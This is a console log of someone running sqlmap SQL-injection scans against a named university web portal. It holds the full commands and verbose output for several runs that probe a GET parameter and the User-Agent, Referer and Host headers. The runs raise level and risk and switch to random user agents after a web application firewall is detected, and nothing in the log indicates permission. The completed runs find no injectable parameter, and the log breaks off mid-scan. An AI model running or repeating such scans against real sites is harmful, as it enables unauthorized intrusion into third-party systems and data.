-z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
--alert=ALERT Run host OS command(s) when SQL injection is found
--beep Beep on question and/or when vulnerability is found
--dependencies Check for missing (optional) sqlmap dependencies
--disable-coloring Disable console output coloring
--list-tampers Display list of available tamper scripts
--no-logging Disable logging to a file
--offline Work in offline mode (only use session data)
--purge Safely remove all content from sqlmap data directory
--results-file=R.. Location of CSV results file in multiple targets mode
--shell Prompt for an interactive sqlmap shell
--tmp-dir=TMPDIR Local directory for storing temporary files
--unstable Adjust options for unstable connections
--update Update sqlmap
--wizard Simple wizard interface for beginner users
Press Enter to continue...
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.7.3#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help
Press Enter to continue...
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.7.3#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:30:53 /2023-03-23/
[15:30:53] [INFO] testing connection to the target URL
[15:30:54] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:30:54] [INFO] testing if the target URL content is stable
[15:30:54] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:30:56] [INFO] testing if GET parameter 'thetime' is dynamic
[15:30:56] [INFO] GET parameter 'thetime' appears to be dynamic
[15:30:56] [INFO] heuristic (basic) test shows that GET parameter 'thetime' might be injectable
[15:30:56] [INFO] testing for SQL injection on GET parameter 'thetime'
[15:30:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:30:57] [INFO] GET parameter 'thetime' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:30:58] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'FrontBase'
it looks like the back-end DBMS is 'FrontBase'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'FrontBase' extending provided level (1) and risk (1) values? [Y/n] Y
[15:31:29] [INFO] testing 'Generic inline queries'
[15:31:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:31:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:31:33] [INFO] checking if the injection point on GET parameter 'thetime' is a false positive
[15:31:33] [WARNING] false positive or unexploitable injection point detected
[15:31:33] [WARNING] GET parameter 'thetime' does not seem to be injectable
[15:31:33] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 15:31:33 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 --dbs --level 5 --risk 3
___
__H__
___ ___[.]_____ ___ ___ {1.7.3#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:31:55 /2023-03-23/
[15:31:56] [INFO] testing connection to the target URL
[15:31:56] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:31:56] [INFO] testing if the target URL content is stable
[15:31:56] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[15:31:58] [INFO] testing if GET parameter 'thetime' is dynamic
[15:31:58] [INFO] GET parameter 'thetime' appears to be dynamic
[15:31:59] [INFO] heuristic (basic) test shows that GET parameter 'thetime' might be injectable
[15:31:59] [INFO] testing for SQL injection on GET parameter 'thetime'
[15:31:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:32:03] [INFO] GET parameter 'thetime' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:32:07] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'PostgreSQL'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[15:32:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:32:38] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:32:38] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:32:38] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:32:38] [INFO] testing 'Generic inline queries'
[15:32:38] [INFO] testing 'PostgreSQL inline queries'
[15:32:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:32:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:32:39] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:32:39] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:32:39] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:32:39] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:32:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:32:40] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:32:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:32:40] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[15:32:40] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:32:40] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[15:32:40] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[15:32:40] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[15:32:41] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[15:32:41] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[15:32:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:32:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:32:44] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:32:48] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:32:52] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:32:55] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:32:58] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:33:01] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:33:04] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:33:07] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:33:10] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:33:13] [INFO] checking if the injection point on GET parameter 'thetime' is a false positive
[15:33:14] [WARNING] false positive or unexploitable injection point detected
[15:33:14] [WARNING] GET parameter 'thetime' does not seem to be injectable
[15:33:14] [INFO] testing if parameter 'User-Agent' is dynamic
[15:33:14] [INFO] parameter 'User-Agent' appears to be dynamic
[15:33:14] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[15:33:14] [INFO] testing for SQL injection on parameter 'User-Agent'
[15:33:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:33:22] [INFO] parameter 'User-Agent' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:33:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:33:22] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:33:23] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:33:23] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:33:23] [INFO] testing 'Generic inline queries'
[15:33:23] [INFO] testing 'PostgreSQL inline queries'
[15:33:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:33:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:33:24] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:33:24] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:33:24] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:33:24] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:33:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:33:24] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:33:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:33:25] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[15:33:25] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:33:25] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[15:33:25] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[15:33:25] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[15:33:26] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[15:33:26] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[15:33:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:33:29] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:33:32] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:33:37] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:33:42] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:33:45] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:33:49] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:33:53] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:33:57] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:34:00] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:34:04] [INFO] checking if the injection point on User-Agent parameter 'User-Agent' is a false positive
[15:34:04] [WARNING] false positive or unexploitable injection point detected
[15:34:04] [WARNING] parameter 'User-Agent' does not seem to be injectable
[15:34:04] [INFO] testing if parameter 'Referer' is dynamic
[15:34:04] [WARNING] parameter 'Referer' does not appear to be dynamic
[15:34:04] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[15:34:04] [INFO] testing for SQL injection on parameter 'Referer'
[15:34:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:34:11] [INFO] parameter 'Referer' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:34:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:34:11] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:34:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:34:12] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:34:12] [INFO] testing 'Generic inline queries'
[15:34:12] [INFO] testing 'PostgreSQL inline queries'
[15:34:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:34:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:34:12] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:34:13] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:34:13] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:34:13] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:34:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:34:13] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:34:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:34:14] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[15:34:14] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:34:14] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[15:34:14] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[15:34:14] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[15:34:14] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[15:34:14] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[15:34:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:34:20] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:34:24] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:34:30] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:34:34] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:34:38] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:34:43] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:34:47] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:34:50] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:34:54] [INFO] checking if the injection point on Referer parameter 'Referer' is a false positive
[15:34:54] [WARNING] false positive or unexploitable injection point detected
[15:34:54] [WARNING] parameter 'Referer' does not seem to be injectable
[15:34:54] [INFO] testing if parameter 'Host' is dynamic
[15:34:54] [WARNING] parameter 'Host' does not appear to be dynamic
[15:34:54] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[15:34:54] [INFO] testing for SQL injection on parameter 'Host'
[15:34:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:34:56] [INFO] parameter 'Host' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:34:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:34:56] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:34:57] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:34:57] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:34:57] [INFO] testing 'Generic inline queries'
[15:34:57] [INFO] testing 'PostgreSQL inline queries'
[15:34:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:34:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:34:57] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:34:58] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:34:58] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:34:58] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:34:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:34:58] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:34:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:34:58] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[15:34:59] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:34:59] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[15:34:59] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[15:34:59] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[15:34:59] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[15:34:59] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[15:34:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:35:03] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:35:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:35:04] [INFO] target URL appears to have 18 columns in query
[15:35:16] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[15:35:19] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:35:22] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:35:25] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:35:29] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:35:32] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:35:35] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:35:38] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:35:42] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:35:45] [INFO] checking if the injection point on Host parameter 'Host' is a false positive
[15:35:45] [WARNING] false positive or unexploitable injection point detected
[15:35:45] [WARNING] parameter 'Host' does not seem to be injectable
[15:35:45] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 15:35:45 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 -p Host --dbs --level 5 --risk 3 --random-agent
___
__H__
___ ___[.]_____ ___ ___ {1.7.3#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:36:28 /2023-03-23/
[15:36:28] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11' from file 'C:\Users\ricky\Desktop\sqlmap-dev\data\txt\user-agents.txt'
[15:36:29] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=aaa0a29UB3h-q4yPpNOBy;TS018de8dc=010ba228940...678a53c179'). Do you want to use those [Y/n] y
[15:36:45] [INFO] testing if the target URL content is stable
[15:36:45] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[15:37:06] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[15:37:07] [INFO] testing for SQL injection on parameter 'Host'
[15:37:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:37:07] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:37:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:37:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:38:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[15:38:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[15:39:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[15:39:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[15:39:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[15:39:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:39:22] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:39:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[15:39:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[15:39:55] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:40:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:40:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:41:07] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:41:24] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:41:38] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:41:53] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:42:05] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'
[15:42:20] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:42:32] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:42:47] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:42:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:42:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:42:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:42:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:42:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:42:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:42:50] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[15:42:50] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (original value)'
[15:42:51] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)'
[15:42:51] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)'
[15:42:51] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[15:42:52] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[15:42:52] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[15:42:52] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[15:42:52] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[15:42:53] [INFO] testing 'Informix boolean-based blind - Parameter replace (original value)'
[15:42:53] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[15:42:53] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
[15:42:54] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[15:42:54] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[15:42:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[15:42:55] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[15:42:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:42:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:42:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:42:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:42:56] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[15:42:57] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (original value)'
[15:42:58] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)'
[15:42:58] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[15:42:59] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)'
[15:43:00] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[15:43:00] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:43:01] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause'
[15:43:01] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:43:02] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause'
[15:43:03] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:43:04] [INFO] testing 'IBM DB2 boolean-based blind - ORDER BY clause'
[15:43:05] [INFO] testing 'IBM DB2 boolean-based blind - ORDER BY clause (original value)'
[15:43:05] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[15:43:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:43:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:43:25] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[15:43:32] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)'
[15:43:40] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[15:43:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries'
[15:43:55] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[15:44:02] [INFO] testing 'Microsoft Access boolean-based blind - Stacked queries'
[15:44:10] [INFO] testing 'SAP MaxDB boolean-based blind - Stacked queries'
[15:44:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:44:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:44:31] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:44:38] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:44:46] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:44:52] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:45:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:45:07] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:45:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:32] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:45:42] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:45:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:46:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:46:07] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:46:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:46:36] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:46:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:46:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[15:46:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[15:47:04] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[15:47:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[15:47:18] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
